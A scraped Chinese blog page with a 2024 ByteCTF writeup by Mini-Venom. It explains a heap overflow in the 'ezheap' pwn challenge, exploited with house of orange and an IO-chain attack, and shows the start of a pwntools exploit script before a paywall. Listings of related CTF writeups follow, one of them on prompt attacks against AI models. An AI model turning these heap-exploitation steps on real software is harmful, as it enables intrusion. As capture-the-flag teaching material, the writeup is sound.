2024 ByteCTF大师赛 writeup by Mini-Venom

原创 于 2024-09-25 17:07:55 发布 · 729 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #运维 #开发语言 #linux

Pwn

ezheap

图片

edit的size可控,所以存在堆溢出。

图片

fake_free所以没法直接释放堆块,所以打house of orange。

图片

禁止调用hook,直接打io链即可。

from pwn import *

libc = ELF('./libc-2.27.so')
elf = ELF('./pwn')
p = remote('113.201.14.253',20791)

def add(size):
    p.sendlineafter('it:','1')
    p.sendlineafter('dd:',str(size))

def show(idx):
    p.sendlineafter('it:', '3')
    p.sendlineafter('how:',str(idx))

def edit(idx,size,content):
    p.sendlineafter('it:', '4')
    p.sendlineafter('it:', str(idx))
    p.sendlineafter('ize',str(size))
    p.sendlineafter('put',content)

def pwn():
    add(0x100)#0
    edit(0,0x110,b'a'*0x108+p64(0xca1))
    add(0x1000)#1
    add(0xc70)#2
  &n
最低0.47元/天 解锁文章
2024 XYCTF比赛 writeup
qq_74349936的博客
04-29 2227
参加了XYCTF,没写几道题,但还是在此记录一下。有什么不对的地方欢迎指正。(吐槽一下,比赛做了几天后就做不动了,一个月时间是真的长。不想做了,不过这篇WP还是定在了比赛结束再发)
网鼎杯MISC--minified(writeup)
热门推荐
灬彬的博客
08-20 1万+
  题目链接: https://pan.baidu.com/s/1NZ4O5_zhGRYkx7ZBxPy6zA 密码: xfum 打开文件。。。文件中只有一张图片   通常图片的题。。首先就丢到binwalk分析一波。。然后stegsolve。。前两步没结果再用winhex打开分析   这题首先binwalk无果。。。 所以用stegsovle打开 调到a0和g0的通道...
Bytectf-几道web总结
weixin_30376453的博客
09-21 1002
1.EZcms 这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化 首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess 这里主要记录一点,利用php内置类进行文件操作, exp为: <?php class File{ public $filename...
ByteCTF 2022】Crypto Writeup
u010883831的博客
09-26 1059
ByteCTF 2022 密码 Crypto writeup Choose_U_flag Compare Card Shark
CTF日常训练WriteUpCTF秀靶场_ctf靶场训练,2024年Golang技术下半场在哪
2401_84247423的博客
04-13 845
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(1)熟悉栅栏密码特性:把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话;
2024 高校网络安全管理运维-实践能力赛项Writeup(misc-2部分解析)
weixin_39435784的博客
05-09 843
2024 高校网络安全管理运维-实践能力赛项Writeup(misc-2部分解析)
2024 高校网络安全管理运维-实践能力赛项Writeupweb-2部分解析)
weixin_39435784的博客
05-09 1765
2024 高校网络安全管理运维-实践能力赛项Writeupweb-2部分解析)
2024 高校网络安全管理运维-实践能力赛项Writeupweb-1部分解析)
weixin_39435784的博客
05-09 2252
2024 高校网络安全管理运维-实践能力赛项Writeupweb-1部分解析)
2024 高校网络安全管理运维-实践能力赛项Writeup(misc-1部分解析)
weixin_39435784的博客
05-09 1853
你是 Foobar 大学的安全分析师。一位名叫张三的员工报告了一封可疑的邮件,并将其提供给你进行分析。你的任务是仔细检查这封邮件,识别潜在的钓鱼指标,找出表明这是一次钓鱼尝试的线索。可疑邮件以 EML 文件的形式提供,请查看附件,你可以。
2024 H&NCTF WriteUP
How2Badlion的博客
05-14 2886
TIP:可以留言给我换友链捏 第二次打ctf 之前只会做服务器取证 不知道为什么就第二了 可能队友比较C吧 本次比赛主要负责的是Musc方向 时间和黄河流域比赛撞了 没ak掉比较可惜
2021安全范儿高校挑战赛ByteCTF线上赛部分Writeup
末初 · mochu7
10-19 1745
文章目录MISC-CheckinMISC-SurveyMISC-HearingNotBelievingMISC-frequentlyWEB-double sqli MISC-Checkin ByteCTF{Empower_Security_Enrich_Life} MISC-Survey ByteCTF{h0p3_y0u_Enjoy_our_ch4ll3n9es!} MISC-HearingNotBelieving hearing.wav使用Audacity打开,查看频谱图在开头发现二维码碎
2021届ByteCtf---double sqli-----writeup----WebCTF------clickhouse
z2560088的博客
10-20 873
通过id =1 and 1=2 和id=1 and 1=1 结果不同断定存在sql注入漏洞 想用sqlmap注入 发现无法指纹识别DBMS 然后用联合查询 ?id=0 union select database() 报错 (union_default_mode) is empty: 原来是没设置DISTINCT/ALL 发现DBMS是clickhouse的 查阅资料 ClickHouse官方文档 system.tables | ClickHouse Do...
ByteCTF-mheap WP
qq_41252520的博客
09-16 569
保护 分析 程序首先分配一个 4096 大小的内存,内存基址指定为 0x23330000: 并自己实现了一套堆分配机制,类似于 fastbin ,通过逆向分析得其结构如下: typedef struct Chunk{ int Size; Chunk *Fd; Chunk *Bk; } 分配大小以 16 字节对齐,并且没有大小限制,导致可以分配超出 0x2...
ByteCTF2021安全范儿高校挑战赛线上Misc-《HearingNotBelieving》
Mark的博客
10-19 3624
刚拿到文件便发现是一段音频,直接丢进Audacity 频率改一下窗口大小再放大(便不会模糊) 前面的是频谱图中有二维码,截图后手拼下得到前半段flag拼接完成我这加了个滤镜才扫出来了 得到第一部分的flag 第二部分的flag需要通过音频转图片的方式得出,这里用到了Robot36这个手机软件(没有软件的可以私聊发给你),在手机上打开软件,然后通过电脑外发音频,手机麦克风接受音频然后得到图片,最后进行拼图 类似这种图很多张 最后ps或ppt进行拼图得到 加个滤镜就可以扫出来 处理下扫描得到后半段
WriteUp - 2023陕西省大学生网络安全技能大赛
GKDf1sh
06-03 478
利用三个dirname()返回到根目录,array_rand()实现随机读取。文章里讲得很详细了,array_rand()实现随机读取文件。要求post参数qaq和name,get参数key。在原payload基础上修改,成功读到waf.php的内容。随机读取,多点几次就出来了。
CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3
arttnba3的博客
01-19 969
github pages address 【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3[github pages address](https://arttnba3.cn/2020/11/23/CTF-0X01-ByteCTF2020-pwn/)0x00.绪论0x01.线上赛 - CTF -PWN0x00.easy_heap - null by any address + tcache poisoning漏洞:任意地址写00x01.gun
CTFHUB | web进阶 | PHP | Bypass disable_function | FFI 扩展
weixin_68416970的博客
08-09 498
查看根目录之后发现了有两个 flag 文件,之后发现了本题的 flag。进入之后无发现,使用插件 PHP74_FFI 之后直接进入终端了。查看源码,发现可以蚁剑连接。
【AI大模型应用开发】1.3 Prompt攻防(安全) 和 Prompt逆向工程
m0_59598029的博客
03-19 1622
本文主要介绍了Prompt攻击和防攻击的手段,这对于大模型应用开发非常重要,毕竟谁也不想自己辛辛苦苦做的东西被拿来干坏事或者隐私遭到泄漏,这对一个应用来说是致命性的。然后稍微介绍了下Prompt逆向工程,这其实就是用来学习优秀Prompt的一种手段。从今天开始,持续学习,开始搞事情。踩坑不易,欢迎关注我,围观我!![在这里插入图片描述](https://img-有任何问题,欢迎+vx:,我也是个小白,期待与志同道合的朋友一起讨论,共同进步!
byteCTF 2024 ezobj(复现)
最新发布
2301_79700060的博客
09-25 1188
类对文件格式解析较严,需要写入的文件必须是其支持的图片格式,如jpg、gif、ico等,这就导致写入的内容有了限制,参考师傅文章知道 ppm 的图片格式允许在末尾随便加脏数据并且没有 crc 校验等,用来上传 webshell 是完全没有问题的,刚刚的内容 base64 解码为。一般直接上传到 html 目录下就可以直接 getshell 了,但是这里的 html 目录没有写入权限,还是需要上传 so 文件才行,那么显然 ppm 的文件格式就不行了,有脏数据。才能查看/tmp 目录下的文件,可以通过。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-优快云博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AI小模型

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值